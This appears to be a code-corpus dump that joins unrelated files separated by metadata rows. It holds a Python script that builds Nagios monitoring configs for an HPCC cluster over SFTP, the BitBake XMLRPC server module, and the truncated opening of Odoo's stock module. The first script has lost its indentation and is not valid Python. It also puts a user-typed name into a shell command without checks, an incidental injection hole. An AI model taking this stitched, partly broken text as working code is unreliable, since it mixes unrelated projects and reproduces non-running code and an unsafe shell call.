Environment = input('Enter Environment Name > ')
Address = input('Enter IP > ')
ProdOrNot = input(
'Please specify whether this environment is production by typing prod, or non-production by typing non-prod > ')
xxx = getpass.getpass()
user = input('Enter username > ')
xml_local = '/tmp/environment.xml'
xml_remote = '/etc/HPCCSystems/environment.xml'
if ProdOrNot == 'prod':
HostDefinition = 'generic-prod-hpcc'
ServiceDefinition = 'hpcc-prod-service'
elif ProdOrNot == 'non-prod':
HostDefinition = 'generic-nonprod-hpcc'
ServiceDefinition = 'hpcc-nonprod-service'
else:
print('Invalid Option')
sys.exit(1)
class XML():
def __init__(self):
self.xml = self
def getXML(self):
host = paramiko.Transport((Address, 22))
host.connect(username=user, password=xxx)
sftp = paramiko.SFTPClient.from_transport(host)
sftp.get(xml_remote, xml_local)
class XMLParser():
def __init__(self):
self.parsing = self
def hpcc_components(self, component_name):
ParseXML = ET.parse(xml_local)
doc_root = ParseXML.getroot()
cluster = []
for i in doc_root.findall('.//{}Process/Instance'.format(component_name)):
ip = i.attrib['netAddress']
cluster.append(ip)
return cluster
def hpcc_master_components(self, component_name):
ParseXML = ET.parse(xml_local)
doc_root = ParseXML.getroot()
ip_port = []
for i in doc_root.findall('.//{}ServerProcess/Instance'.format(component_name)):
master_component = i.attrib['netAddress']
ip_port.append(master_component)
for i in doc_root.findall('.//{}ServerProcess/Instance'.format(component_name)):
port = i.attrib['port']
ip_port.append(port)
return ip_port
def Esp(self):
ParseXML = ET.parse(xml_local)
doc_root = ParseXML.getroot()
ip_port = {}
ports = []
for i in doc_root.findall('.//EspProcess/Instance'):
ip = i.attrib['netAddress']
for i in doc_root.findall('.//EspProcess/EspBinding'):
port = i.attrib['port']
ports.append(port)
ip_port[ip] = ports
return ip_port
def Roxie(self):
ParseXML = ET.parse(xml_local)
doc_root = ParseXML.getroot()
Roxies = []
for roxie in doc_root.findall('.//RoxieServerProcess'):
Roxie = roxie.attrib['computer']
Roxies.append(Roxie)
ip_addr = {}
for node in doc_root.findall('.//Hardware/Computer'):
Machine = node.attrib['name']
IP = node.attrib['netAddress']
ip_addr[Machine] = IP
RoxieSlaves = []
for key in ip_addr:
if key not in Roxies:
continue
elif key in Roxies:
RoxieSlaves.append(ip_addr[key])
return RoxieSlaves
def ThorMaster(self):
ParseXML = ET.parse(xml_local)
doc_root = ParseXML.getroot()
Thors = []
for i in doc_root.findall('.//ThorMasterProcess'):
Thor = i.attrib['computer']
Thors.append(Thor)
d = {}
for i in doc_root.findall('.//Hardware/Computer'):
Machine = i.attrib['name']
IP = i.attrib['netAddress']
d[Machine] = IP
masterport = {}
machine = []
for i in doc_root.findall('.//ThorCluster'):
try:
Computer = i.attrib['computer']
Port = i.attrib['masterport']
if Computer in d:
machine.append(Port)
except KeyError:
continue
masterport.setdefault(d[Computer], [])
masterport[d[Computer]].append(machine)
machine = []
ThorMasters = []
for i in d:
if i not in Thors:
continue
elif i in Thors:
ThorMasters.append(d[i])
return ThorMasters, masterport
def ThorSlave(self):
ParseXML = ET.parse(xml_local)
doc_root = ParseXML.getroot()
Thors = []
for i in doc_root.findall('.//ThorSlaveProcess'):
Thor = i.attrib['computer']
Thors.append(Thor)
d = {}
for i in doc_root.findall('.//Hardware/Computer'):
Machine = i.attrib['name']
IP = i.attrib['netAddress']
d[Machine] = IP
ThorSlaves = []
for i in d:
if i not in Thors:
continue
elif i in Thors:
ThorSlaves.append(d[i])
return ThorSlaves
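# --- Editor's illustrative note (not part of the original script) ---
# The findall() lookups above assume an environment.xml shaped roughly like the
# hypothetical fragment below: component processes carry Instance children with
# netAddress (and sometimes port) attributes, EspProcess exposes its ports on
# EspBinding elements, ThorCluster carries computer/masterport attributes, and
# Hardware/Computer maps machine names to IP addresses.
#
#     <Environment>
#       <Software>
#         <DafilesrvProcess><Instance netAddress="10.0.0.1"/></DafilesrvProcess>
#         <DaliServerProcess><Instance netAddress="10.0.0.1" port="7070"/></DaliServerProcess>
#         <EspProcess>
#           <Instance netAddress="10.0.0.2"/>
#           <EspBinding port="8010"/>
#         </EspProcess>
#         <ThorCluster computer="node3" masterport="20000"/>
#       </Software>
#       <Hardware>
#         <Computer name="node3" netAddress="10.0.0.3"/>
#       </Hardware>
#     </Environment>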
XML().getXML()
hpcc_component = XMLParser()
# List of HPCC Components from xml file.
dafilesrv = hpcc_component.hpcc_components('Dafilesrv')
dali = hpcc_component.hpcc_master_components('Dali')
sasha = hpcc_component.hpcc_master_components('Sasha')
eclagent = hpcc_component.hpcc_components('EclAgent')
eclccserver = hpcc_component.hpcc_components('EclccServer')
eclserver = hpcc_component.hpcc_components('EclServer')
dfuserver = hpcc_component.hpcc_components('DfuServer')
eclscheduler = hpcc_component.hpcc_components('EclScheduler')
esp = hpcc_component.Esp()
roxie = hpcc_component.Roxie()
thormaster = hpcc_component.ThorMaster()
thorslave = hpcc_component.ThorSlave()
print('=== list of IP Addresses ===', '\n', dafilesrv, '\n')
print('Number of servers = ', len(dafilesrv), '\n')
print('=========================== Main Components =======================', '\n')
print('dali = ', dali, '\n')
print('sasha = ', sasha, '\n')
print('eclagent = ', eclagent, '\n')
print('Number of ECLAgents = ', len(eclagent), '\n')
print('eclccserver = ', eclccserver, '\n')
print('Number of eclccservers = ', len(eclccserver), '\n')
print('eclserver = ', eclserver, '\n')
print('Number of eclservers = ', len(eclserver), '\n')
print('dfuserver = ', dfuserver, '\n')
print('Number of DFUServers = ', len(dfuserver), '\n')
print('eclscheduler = ', eclscheduler, '\n')
print('Number of schedulers = ', len(eclscheduler), '\n')
print('esp = ', esp, '\n')
print('Number of ESP Servers = ', len(esp), '\n')
print('Roxie = ', roxie, '\n')
print('Number of Roxie Servers = ', len(roxie), '\n')
print('ThorMaster = ', thormaster[0], '\n')
print('Number of ThorMaster Nodes = ', len(thormaster[0]), '\n')
if len(thormaster[1]) > 0:
print('Port Layout = ', thormaster[1], '\n')
print('ThorSlaves = ', thorslave, '\n')
print('Number of ThorSlaves = ', len(thorslave), '\n')
print('======================================================================', '\n')
### Creating directory structure
EnvironmentDirectory = '/etc/HPCCSystems/nagios/{}'.format(Environment)
if not os.path.isdir(EnvironmentDirectory):
subprocess.call('mkdir -p /etc/HPCCSystems/nagios/{}'.format(Environment), shell=True)
else:
print('Environment already exists')
sys.exit(1)
### Generating host configuration files with basic checks
for ip in dafilesrv:
if ip:
filename = '/etc/HPCCSystems/nagios/{}/{}.cfg'.format(Environment, ip)
config_file = open(filename, 'w')
host_conf = """
define host {{
use {0}
host_name {1}
alias {1}
address {1}
}}
define service {{
use {2}
host_name {1}
service_description Dafilesrv Status
check_command check_dafilesrv
}}
define service {{
use {2}
host_name {1}
service_description SSH Status
check_command check_ssh
}}
""".format(HostDefinition, ip, ServiceDefinition)
config_file.write(host_conf)
config_file.close()
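# --- Editor's illustrative note (not part of the original script) ---
# For a hypothetical production node 10.0.0.5 in environment "myenv", the
# template above renders /etc/HPCCSystems/nagios/myenv/10.0.0.5.cfg roughly as:
#
#     define host {
#         use                  generic-prod-hpcc
#         host_name            10.0.0.5
#         alias                10.0.0.5
#         address              10.0.0.5
#     }
#     define service {
#         use                  hpcc-prod-service
#         host_name            10.0.0.5
#         service_description  Dafilesrv Status
#         check_command        check_dafilesrv
#     }
#     (plus the analogous "SSH Status" service block)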
### Appending Dali entry to host configuration file
def InsertDaliEntry():
filename = '/etc/HPCCSystems/nagios/{}/{}.cfg'.format(Environment, dali[0])
config_file = open(filename, 'a')
host_conf = """
define service {{
use {}
host_name {}
service_description Dali Service Status
check_command check_dali!{}!5000
}}
""".format(ServiceDefinition, dali[0], dali[1])
config_file.write(host_conf)
config_file.close()
### Appending Sasha entry to host configuration file
def InsertSashaEntry():
filename = '/etc/HPCCSystems/nagios/{}/{}.cfg'.format(Environment, sasha[0])
config_file = open(filename, 'a')
host_conf = """
define service {{
use {}
host_name {}
service_description Sasha Service Status
check_command check_sasha!{}!5000
}}
""".format(ServiceDefinition, sasha[0], sasha[1])
config_file.write(host_conf)
config_file.close()
### Appending ESP entry to host configuration file
def InsertESPServerEntry():
for ip in esp:
filename = '/etc/HPCCSystems/nagios/{}/{}.cfg'.format(Environment, ip)
config_file = open(filename, 'a')
for port in esp[ip]:
host_conf = """
define service {{
use {0}
host_name {1}
service_description ESP Status port {2}
check_command check_esp!{2}
}}
""".format(ServiceDefinition, ip, port)
config_file.write(host_conf)
config_file.close()
### Appending Roxie entry to host configuration file
def InsertRoxieEntry():
if roxie:
for ip in roxie:
filename = '/etc/HPCCSystems/nagios/{}/{}.cfg'.format(Environment, ip)
config_file = open(filename, 'a')
host_conf = """
define service {{
use {}
host_name {}
service_description Roxie Status
check_command check_roxie
}}
""".format(ServiceDefinition, ip)
config_file.write(host_conf)
config_file.close()
### Appending ThorMaster entry to host configuration file
def InsertThorMasterEntry():
if thormaster:
for ip in thormaster[0]:
if len(thormaster[1]) > 0:
for port in thormaster[1][ip]:
filename = '/etc/HPCCSystems/nagios/{}/{}.cfg'.format(Environment, ip)
config_file = open(filename, 'a')
host_conf = """
define service {{
use {0}
host_name {1}
service_description ThorMaster Status port {2}
check_command check_thormaster!{2}
}}
""".format(ServiceDefinition, ip, int(port[0]))
config_file.write(host_conf)
config_file.close()
else:
filename = '/etc/HPCCSystems/nagios/{}/{}.cfg'.format(Environment, ip)
config_file = open(filename, 'a')
host_conf = """
define service {{
use {}
host_name {}
service_description ThorMaster Status port 20000
check_command check_thormaster!20000
}}
""".format(ServiceDefinition, ip)
config_file.write(host_conf)
config_file.close()
### Appending new entries to hostgroup file
def EditHostGroups():
hostgroup_filename = open('/etc/HPCCSystems/nagios/{0}/{0}_hostgroup.cfg'.format(Environment), 'a')
cleanup = ','.join(dafilesrv)
bulk = """
define hostgroup {{
hostgroup_name {0}
alias {0}
members {1}
}}
""".format(Environment, cleanup)
hostgroup_filename.write(bulk)
hostgroup_filename.close()
def hpccCommands():
filename = '/etc/HPCCSystems/nagios/hpcc_objects/hpcc_commands.cfg'
if not os.path.isfile(filename):
config_file = open(filename, 'a')
command_conf = """
### HPCC Platform Checks ###
define command{
command_name check_dafilesrv
command_line /usr/lib/nagios/plugins/check_dafilesrv $HOSTADDRESS$
}
define command{
command_name check_dali
command_line /usr/lib/nagios/plugins/check_dali $HOSTADDRESS$ $ARG1$ $ARG2$
}
define command{
command_name check_roxie
command_line /usr/lib/nagios/plugins/check_roxie $HOSTADDRESS$
}
define command{
command_name check_sasha
command_line /usr/lib/nagios/plugins/check_sasha $HOSTADDRESS$ $ARG1$ $ARG2$
}
### HPCC Custom Checks ###
define command{
command_name check_esp
command_line /usr/local/nagios/libexec/check_tcp -H $HOSTADDRESS$ -p $ARG1$
}
define command{
command_name check_thormaster
command_line /usr/local/nagios/libexec/check_tcp -H $HOSTADDRESS$ -p $ARG1$
}
"""
config_file.write(command_conf)
config_file.close()
def hpccTimePeriods():
filename = '/etc/HPCCSystems/nagios/hpcc_objects/hpcc_timeperiods.cfg'
if not os.path.isfile(filename):
config_file = open(filename, 'a')
definitions_conf = """
# This defines a timeperiod where all times are valid for checks,
# notifications, etc. The classic "24x7" support nightmare. :-)
define timeperiod{
timeperiod_name hpcc-24x7
alias 24 Hours A Day, 7 Days A Week
sunday 00:00-24:00
monday 00:00-24:00
tuesday 00:00-24:00
wednesday 00:00-24:00
thursday 00:00-24:00
friday 00:00-24:00
saturday 00:00-24:00
}
# 'workhours/banker hours' timeperiod definition for non-production systems
define timeperiod{
timeperiod_name hpcc-workhours
alias Normal Work Hours
monday 06:00-17:00
tuesday 06:00-17:00
wednesday 06:00-17:00
thursday 06:00-17:00
friday 06:00-17:00
}
"""
config_file.write(definitions_conf)
config_file.close()
def hpccContacts():
filename = '/etc/HPCCSystems/nagios/hpcc_objects/hpcc_contacts.cfg'
if not os.path.isfile(filename):
config_file = open(filename, 'a')
definitions_conf = """
define contact{
contact_name hpcc_support_team ; Short name of user
use generic-contact ; Inherit default values from generic-contact template
alias ; Full name of user
email somedistributionlist@someplace.com ; <<***** CHANGE THIS TO YOUR EMAIL ADDRESS ******
}
define contactgroup{
contactgroup_name hpcc-admins
alias hpcc-administrators
members hpcc_support_team
}
"""
config_file.write(definitions_conf)
config_file.close()
def hpccProdDefinitions():
filename = '/etc/HPCCSystems/nagios/hpcc_objects/hpcc_prod_definitions.cfg'
if not os.path.isfile(filename):
config_file = open(filename, 'a')
definitions_conf = """
# HPCC Host Definition
define host{
name generic-prod-hpcc ; The name of this host template
notifications_enabled 1 ; Host notifications are enabled
event_handler_enabled 1 ; Host event handler is enabled
flap_detection_enabled 1 ; Flap detection is enabled
process_perf_data 1 ; Process performance data
retain_status_information 1 ; Retain status information across program restarts
retain_nonstatus_information 1 ; Retain non-status information across program restarts
notification_period hpcc-24x7 ; Send host notifications at any time
notification_interval 30 ; Resend notifications every 30 minutes
notification_options d,r ; Only send notifications for specific host states
contact_groups hpcc-admins ; Notifications get sent to the admins by default
check_period hpcc-24x7 ; By default, switches are monitored round the clock
check_interval m5 ; Switches are checked every 5 minutes
retry_interval 1 ; Schedule host check retries at 1 minute intervals
max_check_attempts 10 ; Check each switch 10 times (max)
check_command check-host-alive ; Default command to check if routers are "alive"
register 0 ; DONT REGISTER THIS DEFINITION - ITS NOT A REAL HOST, JUST A TEMPLATE!
}
# HPCC Service Definition
define service{
name hpcc-prod-service ; The 'name' of this service template
active_checks_enabled 1 ; Active service checks are enabled
passive_checks_enabled 1 ; Passive service checks are enabled/accepted
parallelize_check 1 ; Active service checks should be parallelized (disabling this can lead to major performance problems)
obsess_over_service 1 ; We should obsess over this service (if necessary)
check_freshness 0 ; Default is to NOT check service 'freshness'
notifications_enabled 1 ; Service notifications are enabled
event_handler_enabled 1 ; Service event handler is enabled
flap_detection_enabled 1 ; Flap detection is enabled
process_perf_data 1 ; Process performance data
retain_status_information 1 ; Retain status information across program restarts
retain_nonstatus_information 1 ; Retain non-status information across program restarts
is_volatile 0 ; The service is not volatile
check_period hpcc-24x7 ; The service can be checked at any time of the day
max_check_attempts 3 ; Re-check the service up to 3 times in order to determine its final (hard) state
normal_check_interval 10 ; Check the service every 10 minutes under normal conditions
retry_check_interval 2 ; Re-check the service every two minutes until a hard state can be determined
contact_groups hpcc-admins ; Notifications get sent out to everyone in the 'admins' group
notification_options w,u,c,r ; Send notifications about warning, unknown, critical, and recovery events
notification_interval 60 ; Re-notify about service problems every hour
notification_period hpcc-24x7 ; Notifications can be sent out at any time
register 0 ; DONT REGISTER THIS DEFINITION - ITS NOT A REAL SERVICE, JUST A TEMPLATE!
}
"""
config_file.write(definitions_conf)
config_file.close()
def hpccNonProdDefinitions():
filename = '/etc/HPCCSystems/nagios/hpcc_objects/hpcc_nonprod_definitions.cfg'
if not os.path.isfile(filename):
config_file = open(filename, 'a')
definitions_conf = """
# HPCC Host Definition
define host{
name generic-nonprod-hpcc ; The name of this host template
notifications_enabled 1 ; Host notifications are enabled
event_handler_enabled 1 ; Host event handler is enabled
flap_detection_enabled 1 ; Flap detection is enabled
process_perf_data 1 ; Process performance data
retain_status_information 1 ; Retain status information across program restarts
retain_nonstatus_information 1 ; Retain non-status information across program restarts
notification_period hpcc-workhours ; Send host notifications during work hours only
notification_interval 30 ; Resend notifications every 30 minutes
notification_options d,r ; Only send notifications for specific host states
contact_groups hpcc-admins ; Notifications get sent to the admins by default
check_period hpcc-24x7 ; By default, switches are monitored round the clock
check_interval m5 ; Switches are checked every 5 minutes
retry_interval 1 ; Schedule host check retries at 1 minute intervals
max_check_attempts 10 ; Check each switch 10 times (max)
check_command check-host-alive ; Default command to check if routers are "alive"
register 0 ; DONT REGISTER THIS DEFINITION - ITS NOT A REAL HOST, JUST A TEMPLATE!
}
# HPCC Service Definition
define service{
name hpcc-nonprod-service
active_checks_enabled 1
passive_checks_enabled 1
parallelize_check 1
obsess_over_service 1
check_freshness 0
notifications_enabled 1
event_handler_enabled 1
flap_detection_enabled 1
process_perf_data 1
retain_status_information 1
retain_nonstatus_information 1
is_volatile 0
check_period hpcc-24x7
max_check_attempts 3
normal_check_interval 10
retry_check_interval 2
contact_groups hpcc-admins
notification_options w,u,c,r
notification_interval 60
notification_period hpcc-workhours
register 0
}
"""
config_file.write(definitions_conf)
config_file.close()
### Creating configuration files
InsertDaliEntry()
InsertSashaEntry()
InsertESPServerEntry()
InsertRoxieEntry()
InsertThorMasterEntry()
EditHostGroups()
hpccTimePeriods()
hpccContacts()
hpccCommands()
hpccProdDefinitions()
hpccNonProdDefinitions()
### Changing file ownership
subprocess.call('chown nagios. /etc/HPCCSystems/nagios/ -R', shell=True)
### Restarting Nagios application
subprocess.call('systemctl restart nagios.service', shell=True)
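# --- Editor's illustrative usage note (not part of the original script) ---
# The script is interactive and is expected to run with root privileges on the
# Nagios host; the values below are hypothetical:
#
#     $ sudo python3 hpcc_centralized_nagios.py
#     Enter Environment Name > myenv
#     Enter IP > 10.0.0.1
#     Please specify ... > prod
#     Password:
#     Enter username > hpcc
#
# It then pulls /etc/HPCCSystems/environment.xml from the given node over SFTP,
# writes the generated object files under /etc/HPCCSystems/nagios/myenv/, and
# restarts the Nagios service.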
|
apache-2.0
| 1,601,087,806,931,783,200
| 37.804762
| 166
| 0.553565
| false
| 4.128166
| true
| false
| false
|
dellysunnymtech/bitbake
|
lib/bb/server/xmlrpc.py
|
1
|
13251
|
#
# BitBake XMLRPC Server
#
# Copyright (C) 2006 - 2007 Michael 'Mickey' Lauer
# Copyright (C) 2006 - 2008 Richard Purdie
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
"""
This module implements an xmlrpc server for BitBake.
Use this by deriving a class from BitBakeXMLRPCServer and then adding
methods which you want to "export" via XMLRPC. If the methods have the
prefix xmlrpc_, then registering those functions will happen automatically;
if not, you need to call register_function.
Use register_idle_function() to add a function which the xmlrpc server
calls from within serve_forever when no requests are pending. Make sure
that those functions are non-blocking or else you will introduce latency
in the server's main loop.
"""
import bb
import xmlrpclib, sys
from bb import daemonize
from bb.ui import uievent
import hashlib, time
import socket
import os, signal
import threading
try:
import cPickle as pickle
except ImportError:
import pickle
DEBUG = False
from SimpleXMLRPCServer import SimpleXMLRPCServer, SimpleXMLRPCRequestHandler
import inspect, select, httplib
from . import BitBakeBaseServer, BitBakeBaseServerConnection, BaseImplServer
class BBTransport(xmlrpclib.Transport):
def __init__(self, timeout):
self.timeout = timeout
self.connection_token = None
xmlrpclib.Transport.__init__(self)
# Modified from default to pass timeout to HTTPConnection
def make_connection(self, host):
#return an existing connection if possible. This allows
#HTTP/1.1 keep-alive.
if self._connection and host == self._connection[0]:
return self._connection[1]
# create a HTTP connection object from a host descriptor
chost, self._extra_headers, x509 = self.get_host_info(host)
#store the host argument along with the connection object
self._connection = host, httplib.HTTPConnection(chost, timeout=self.timeout)
return self._connection[1]
def set_connection_token(self, token):
self.connection_token = token
def send_content(self, h, body):
if self.connection_token:
h.putheader("Bitbake-token", self.connection_token)
xmlrpclib.Transport.send_content(self, h, body)
def _create_server(host, port, timeout = 60):
t = BBTransport(timeout)
s = xmlrpclib.ServerProxy("http://%s:%d/" % (host, port), transport=t, allow_none=True)
return s, t
class BitBakeServerCommands():
def __init__(self, server):
self.server = server
self.has_client = False
def registerEventHandler(self, host, port):
"""
Register a remote UI Event Handler
"""
s, t = _create_server(host, port)
# we don't allow connections if the cooker is running
if (self.cooker.state in [bb.cooker.state.parsing, bb.cooker.state.running]):
return None
self.event_handle = bb.event.register_UIHhandler(s)
return self.event_handle
def unregisterEventHandler(self, handlerNum):
"""
Unregister a remote UI Event Handler
"""
return bb.event.unregister_UIHhandler(handlerNum)
def runCommand(self, command):
"""
Run a cooker command on the server
"""
return self.cooker.command.runCommand(command, self.server.readonly)
def getEventHandle(self):
return self.event_handle
def terminateServer(self):
"""
Trigger the server to quit
"""
self.server.quit = True
print("Server (cooker) exiting")
return
def addClient(self):
if self.has_client:
return None
token = hashlib.md5(str(time.time())).hexdigest()
self.server.set_connection_token(token)
self.has_client = True
return token
def removeClient(self):
if self.has_client:
self.server.set_connection_token(None)
self.has_client = False
if self.server.single_use:
self.server.quit = True
# This request handler checks if the request has a "Bitbake-token" header
# field (this comes from the client side) and compares it with its internal
# "Bitbake-token" field (this comes from the server). If the two are not
# equal, it is assumed that a client is trying to connect to the server
# while another client is connected to the server. In this case, a 503 error
# ("service unavailable") is returned to the client.
class BitBakeXMLRPCRequestHandler(SimpleXMLRPCRequestHandler):
def __init__(self, request, client_address, server):
self.server = server
SimpleXMLRPCRequestHandler.__init__(self, request, client_address, server)
def do_POST(self):
try:
remote_token = self.headers["Bitbake-token"]
except:
remote_token = None
if remote_token != self.server.connection_token and remote_token != "observer":
self.report_503()
else:
if remote_token == "observer":
self.server.readonly = True
else:
self.server.readonly = False
SimpleXMLRPCRequestHandler.do_POST(self)
def report_503(self):
self.send_response(503)
response = 'No more clients allowed'
self.send_header("Content-type", "text/plain")
self.send_header("Content-length", str(len(response)))
self.end_headers()
self.wfile.write(response)
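# --- Editor's illustrative sketch (not part of the original module) ---
# The token check above pairs with the client-side transport defined earlier:
# a regular client obtains a token via addClient() and sends it back in the
# "Bitbake-token" header on every request, while a read-only UI sends the
# literal "observer". Roughly (host, port and command are hypothetical):
#
#     server, transport = _create_server("localhost", 8100)
#     token = server.addClient()            # None if another client is attached
#     if token is not None:
#         transport.set_connection_token(token)
#         result = server.runCommand(["getVariable", "BBPATH"])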
class XMLRPCProxyServer(BaseImplServer):
""" not a real working server, but a stub for a proxy server connection
"""
def __init__(self, host, port):
self.host = host
self.port = port
class XMLRPCServer(SimpleXMLRPCServer, BaseImplServer):
# remove this when you're done with debugging
# allow_reuse_address = True
def __init__(self, interface):
"""
Constructor
"""
BaseImplServer.__init__(self)
if (interface[1] == 0): # anonymous port, not getting reused
self.single_use = True
# Use auto port configuration
if (interface[1] == -1):
interface = (interface[0], 0)
SimpleXMLRPCServer.__init__(self, interface,
requestHandler=BitBakeXMLRPCRequestHandler,
logRequests=False, allow_none=True)
self.host, self.port = self.socket.getsockname()
self.connection_token = None
#self.register_introspection_functions()
self.commands = BitBakeServerCommands(self)
self.autoregister_all_functions(self.commands, "")
self.interface = interface
self.single_use = False
def addcooker(self, cooker):
BaseImplServer.addcooker(self, cooker)
self.commands.cooker = cooker
def autoregister_all_functions(self, context, prefix):
"""
Convenience method for registering all functions in the scope
of this class that start with a common prefix
"""
methodlist = inspect.getmembers(context, inspect.ismethod)
for name, method in methodlist:
if name.startswith(prefix):
self.register_function(method, name[len(prefix):])
def serve_forever(self):
# Start the actual XMLRPC server
bb.cooker.server_main(self.cooker, self._serve_forever)
def _serve_forever(self):
"""
Serve Requests. Overloaded to honor a quit command
"""
self.quit = False
while not self.quit:
fds = [self]
nextsleep = 0.1
for function, data in self._idlefuns.items():
try:
retval = function(self, data, False)
if retval is False:
del self._idlefuns[function]
elif retval is True:
nextsleep = 0
else:
fds = fds + retval
except SystemExit:
raise
except:
import traceback
traceback.print_exc()
pass
socktimeout = self.socket.gettimeout() or nextsleep
socktimeout = min(socktimeout, nextsleep)
# Mirror what BaseServer handle_request would do
try:
fd_sets = select.select(fds, [], [], socktimeout)
if fd_sets[0] and self in fd_sets[0]:
self._handle_request_noblock()
except IOError:
# we ignore interrupted calls
pass
# Tell idle functions we're exiting
for function, data in self._idlefuns.items():
try:
retval = function(self, data, True)
except:
pass
self.server_close()
return
def set_connection_token(self, token):
self.connection_token = token
class BitBakeXMLRPCServerConnection(BitBakeBaseServerConnection):
def __init__(self, serverImpl, clientinfo=("localhost", 0), observer_only = False, featureset = []):
self.connection, self.transport = _create_server(serverImpl.host, serverImpl.port)
self.clientinfo = clientinfo
self.serverImpl = serverImpl
self.observer_only = observer_only
self.featureset = featureset
def connect(self, token = None):
if token is None:
if self.observer_only:
token = "observer"
else:
token = self.connection.addClient()
if token is None:
return None
self.transport.set_connection_token(token)
self.events = uievent.BBUIEventQueue(self.connection, self.clientinfo)
for event in bb.event.ui_queue:
self.events.queue_event(event)
_, error = self.connection.runCommand(["setFeatures", self.featureset])
if error:
# no need to log it here, the error shall be sent to the client
raise BaseException(error)
return self
def removeClient(self):
if not self.observer_only:
self.connection.removeClient()
def terminate(self):
# Don't wait for server indefinitely
import socket
socket.setdefaulttimeout(2)
try:
self.events.system_quit()
except:
pass
try:
self.connection.removeClient()
except:
pass
class BitBakeServer(BitBakeBaseServer):
def initServer(self, interface = ("localhost", 0)):
self.interface = interface
self.serverImpl = XMLRPCServer(interface)
def detach(self):
daemonize.createDaemon(self.serverImpl.serve_forever, "bitbake-cookerdaemon.log")
del self.cooker
def establishConnection(self, featureset):
self.connection = BitBakeXMLRPCServerConnection(self.serverImpl, self.interface, False, featureset)
return self.connection.connect()
def set_connection_token(self, token):
self.connection.transport.set_connection_token(token)
class BitBakeXMLRPCClient(BitBakeBaseServer):
def __init__(self, observer_only = False, token = None):
self.token = token
self.observer_only = observer_only
# if we need extra caches, just tell the server to load them all
pass
def saveConnectionDetails(self, remote):
self.remote = remote
def establishConnection(self, featureset):
# The format of "remote" must be "server:port"
try:
[host, port] = self.remote.split(":")
port = int(port)
except Exception as e:
bb.warn("Failed to read remote definition (%s)" % str(e))
raise e
# We need our IP for the server connection. We get the IP
# by trying to connect with the server
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect((host, port))
ip = s.getsockname()[0]
s.close()
except Exception as e:
bb.warn("Could not create socket for %s:%s (%s)" % (host, port, str(e)))
raise e
try:
self.serverImpl = XMLRPCProxyServer(host, port)
self.connection = BitBakeXMLRPCServerConnection(self.serverImpl, (ip, 0), self.observer_only, featureset)
return self.connection.connect(self.token)
except Exception as e:
bb.warn("Could not connect to server at %s:%s (%s)" % (host, port, str(e)))
raise e
def endSession(self):
self.connection.removeClient()
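# --- Editor's illustrative sketch (not part of the original module) ---
# Connecting to an already-running server with the client class above, e.g.
# from a UI process; the address and feature set are hypothetical:
#
#     client = BitBakeXMLRPCClient(observer_only=True)
#     client.saveConnectionDetails("127.0.0.1:8100")
#     connection = client.establishConnection(featureset=[])
#     try:
#         connection.connection.runCommand(["getVariable", "TMPDIR"])
#     finally:
#         client.endSession()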
|
gpl-2.0
| -5,845,057,423,331,369,000
| 33.871053
| 117
| 0.622066
| false
| 4.302273
| false
| false
| false
|
bplancher/odoo
|
addons/stock/stock.py
|
1
|
300413
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from datetime import date, datetime
from dateutil import relativedelta
import json
import time
import sets
import openerp
from openerp.osv import fields, osv
from openerp.tools.float_utils import float_compare, float_round
from openerp.tools.translate import _
from openerp.tools import DEFAULT_SERVER_DATETIME_FORMAT, DEFAULT_SERVER_DATE_FORMAT
from openerp import SUPERUSER_ID, api, models
import openerp.addons.decimal_precision as dp
from openerp.addons.procurement import procurement
import logging
from openerp.exceptions import UserError
_logger = logging.getLogger(__name__)
#----------------------------------------------------------
# Incoterms
#----------------------------------------------------------
class stock_incoterms(osv.osv):
_name = "stock.incoterms"
_description = "Incoterms"
_columns = {
'name': fields.char('Name', required=True, help="Incoterms are series of sales terms. They are used to divide transaction costs and responsibilities between buyer and seller and reflect state-of-the-art transportation practices."),
'code': fields.char('Code', size=3, required=True, help="Incoterm Standard Code"),
'active': fields.boolean('Active', help="By unchecking the active field, you may hide an INCOTERM you will not use."),
}
_defaults = {
'active': True,
}
#----------------------------------------------------------
# Stock Location
#----------------------------------------------------------
class stock_location(osv.osv):
_name = "stock.location"
_description = "Inventory Locations"
_parent_name = "location_id"
_parent_store = True
_parent_order = 'name'
_order = 'parent_left'
_rec_name = 'complete_name'
def _location_owner(self, cr, uid, location, context=None):
''' Return the company owning the location if any '''
return location and (location.usage == 'internal') and location.company_id or False
def _complete_name(self, cr, uid, ids, name, args, context=None):
""" Forms complete name of location from parent location to child location.
@return: Dictionary of values
"""
res = {}
for m in self.browse(cr, uid, ids, context=context):
res[m.id] = m.name
parent = m.location_id
while parent:
res[m.id] = parent.name + '/' + res[m.id]
parent = parent.location_id
return res
def _get_sublocations(self, cr, uid, ids, context=None):
""" return all sublocations of the given stock locations (included) """
if context is None:
context = {}
context_with_inactive = context.copy()
context_with_inactive['active_test'] = False
return self.search(cr, uid, [('id', 'child_of', ids)], context=context_with_inactive)
def _name_get(self, cr, uid, location, context=None):
name = location.name
while location.location_id and location.usage != 'view':
location = location.location_id
name = location.name + '/' + name
return name
def name_get(self, cr, uid, ids, context=None):
res = []
for location in self.browse(cr, uid, ids, context=context):
res.append((location.id, self._name_get(cr, uid, location, context=context)))
return res
_columns = {
'name': fields.char('Location Name', required=True, translate=True),
'active': fields.boolean('Active', help="By unchecking the active field, you may hide a location without deleting it."),
'usage': fields.selection([
('supplier', 'Vendor Location'),
('view', 'View'),
('internal', 'Internal Location'),
('customer', 'Customer Location'),
('inventory', 'Inventory Loss'),
('procurement', 'Procurement'),
('production', 'Production'),
('transit', 'Transit Location')],
'Location Type', required=True,
help="""* Vendor Location: Virtual location representing the source location for products coming from your vendors
\n* View: Virtual location used to create a hierarchical structures for your warehouse, aggregating its child locations ; can't directly contain products
\n* Internal Location: Physical locations inside your own warehouses,
\n* Customer Location: Virtual location representing the destination location for products sent to your customers
\n* Inventory Loss: Virtual location serving as counterpart for inventory operations used to correct stock levels (Physical inventories)
